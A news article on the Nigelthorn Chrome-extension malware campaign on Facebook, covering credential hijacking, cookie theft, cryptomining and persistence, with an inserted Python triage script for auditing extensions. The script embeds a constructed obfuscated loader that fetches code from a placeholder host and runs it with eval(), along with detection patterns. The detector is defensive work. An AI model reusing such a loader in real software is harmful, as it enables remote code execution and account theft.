14 May 2018

Nigelthorn malware steals Facebook credentials, mines for cryptocurrency

A new malware campaign has been uncovered on Facebook which not only steals account credentials but also installs scripts for covert cryptocurrency mining.

Cybersecurity firm Radware said in a blog post on Thursday that Nigelthorn is a new campaign which focuses on the Facebook social network.

The malware is so called due to the abuse of a legitimate Google Chrome extension called "Nigelify," which replaces images displayed on a web page with pictures of Nigel Thornberry, a cartoon character from the television show The Wild Thornberrys. Nigelthorn was discovered in May this year and has infected over 100,000 Facebook users in over 100 countries to date. According to Radware researchers, the Nigelthorn campaign is propagating across the social network through social engineering and private messages and aims to dupe users into downloading malware for the purpose of account hijacking, cryptojacking, and click fraud.

Potential victims will see a message from a connection in their network which tags them in a post or will receive private messages which alternatively contain a malicious link or picture.

If a victim clicks through, the malicious link redirects victims to a fake YouTube page which requests that users install a Google Chrome extension in order to play video content.

In order to bypass Google's validation checks, the threat actor responsible creates copies of legitimate extensions and injects short, obfuscated, malicious scripts into them.

Once a user accepts the "Add Extension" request, a malicious extension is installed and the victim's system is added to a botnet.

These malicious extensions also redirect the victim to Facebook in order to generate a session token and hijack their online session, harvesting their Facebook account credentials and sending them to a command-and-control (C&C) server.

This access also permits the malware to send messages in their stead and propagate further. Nigelthorn is also capable of stealing Instagram cookies if they are found. Once the malicious extension is installed on the Google Chrome browser, malicious JavaScript comes into play. The script is downloaded from the C&C server and further installs a cryptomining tool.
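As an added example (not code from Radware's report or the original article), a small triage script for the cloned-extension technique described above: it audits a Chrome extension's manifest and script sources for the combination of broad host permissions and a short remote-loader that fetches a second stage and runs it with eval(). The sample manifest and script are constructed for illustration; the URL, identifiers and heuristics are assumptions, not Nigelthorn's actual code.

```python
import re

# Constructed sample: a cloned image-replacer extension whose manifest and
# background script carry an injected remote loader (hypothetical, not real).
SAMPLE_MANIFEST = {
    "name": "Image Replacer (copy)",
    "manifest_version": 2,
    "permissions": ["tabs", "storage", "<all_urls>", "*://*.facebook.com/*"],
    "background": {"scripts": ["background.js"]},
}

SAMPLE_BACKGROUND_JS = r"""
// original, benign functionality
function replaceImages(tab) { chrome.tabs.sendMessage(tab.id, {act: "replace"}); }
// injected loader: base64 of the placeholder http://example.invalid/s.js,
// fetched and then passed to eval()
var _0x1a=['aHR0cDovL2V4YW1wbGUuaW52YWxpZC9zLmpz'];
fetch(atob(_0x1a[0])).then(r=>r.text()).then(t=>eval(t));
"""

# Permissions that let an extension read every page and session (assumed list).
RISKY_PERMISSIONS = {"<all_urls>", "tabs", "webRequest", "webRequestBlocking", "cookies"}
REMOTE_LOADER = re.compile(r"\b(fetch|XMLHttpRequest|importScripts)\s*\(")
DYNAMIC_EVAL = re.compile(r"\b(eval|Function)\s*\(|\batob\s*\(")
HEX_IDENT = re.compile(r"\b_0x[0-9a-f]{2,}\b")  # obfuscator-style names


def audit_extension(manifest: dict, scripts: dict) -> list:
    """Return human-readable findings for an unpacked extension.

    manifest: parsed manifest.json; scripts: {filename: source text}.
    """
    findings = []
    perms = set(manifest.get("permissions", []))
    for p in sorted(perms & RISKY_PERMISSIONS):
        findings.append(f"risky permission: {p}")
    for p in sorted(perms):
        if "facebook.com" in p or "instagram.com" in p:
            findings.append(f"host permission on social network: {p}")
    for name, src in scripts.items():
        # A loader that downloads code and executes it is the pattern to flag,
        # not fetch() or atob() on their own.
        if REMOTE_LOADER.search(src) and DYNAMIC_EVAL.search(src):
            findings.append(f"{name}: remote fetch combined with dynamic code execution")
        if HEX_IDENT.search(src):
            findings.append(f"{name}: obfuscator-style identifiers (_0x...)")
    return findings


if __name__ == "__main__":
    for line in audit_extension(SAMPLE_MANIFEST, {"background.js": SAMPLE_BACKGROUND_JS}):
        print(line)
```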

This tool forces the victim's machine to covertly mine for cryptocurrencies, with the proceeds sent to mining pools controlled by the attacker. Radware says that in the last few days Monero, Bytecoin, and Electroneum have been the mining targets, and that the attackers have made roughly $1,000.

Nigelthorn employs a number of techniques in order to maintain persistence on the victim's machine. If a victim tries to open the extensions tab, the malware automatically closes it. The malware also blocks users from downloading Facebook and Chrome cleaner tools, deleting Facebook posts, and making comments.

While malicious copies of Nigelify are responsible for the majority of infections, the researchers have also discovered other legitimate extensions which have been abused including PwnerLike and iHabno. Four other extensions were detected by Google's security systems and were removed in less than 24 hours.

The majority of infections have taken place in the Philippines, Venezuela, and Ecuador. "The malware depends on Chrome and runs on both Windows and Linux," the researchers say. "It is important to emphasize that the campaign focuses on Chrome browsers and Radware believes that users that do not use Chrome are not at risk."

A Google spokesperson said that "we removed the malicious extensions from Chrome Web Store and the browsers of the small percentage of affected users within hours of being alerted."

Tags:
information leaks Facebook
Source:
ZDNet